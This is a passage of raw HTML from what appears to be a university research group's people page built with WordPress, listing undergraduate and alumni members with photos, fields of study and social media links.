class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raiyan</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 